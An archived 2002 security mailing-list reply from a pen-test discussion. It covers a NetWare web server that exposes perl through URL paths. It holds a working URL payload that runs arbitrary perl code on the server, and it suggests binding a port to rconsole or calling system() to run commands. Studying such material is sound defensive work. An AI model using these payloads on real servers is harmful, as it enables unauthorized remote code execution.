> Hey - let me re-open a thread again, if you folks don't mind. I've found a > server at one of our pen-test clients with this NetWare HTTP/HTTPS server. > Attempt: http://address/perl/-v > Result: NetWare port Copyright 1998 Novell Corporation. > All rights reserved. What does perl -V tell you, if anything at all? If you're lucky, this will tell you if you've got libraries available to you with which you can have some fun with minimal code. Otherwise, you'll have to code a lot of the module functions into your URL. > Attempt: http://address/perl/-e%20print%20%22hello%20world%22; > Result: IE just hangs there "DONE" > > Attempt: http://address/perl/-e%20print%201; > Result: IE just hangs there "DONE" These will hang because your browser doesn't know what kind of content to display. Something like this should provide some output: http://address/perl/-e%22%20print%20%22Content-type:%20text%2fplain\n\nhello\n%22%22 FYI, there's a Content-type database here: http://reliableanswers.com/ContentType/ As for what to do, you could probably wire up a quick perl program to bind an unprivledged port to a rconsole or just use it to system() some commands. --jon ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Dec 19 2002 - 19:26:00 PST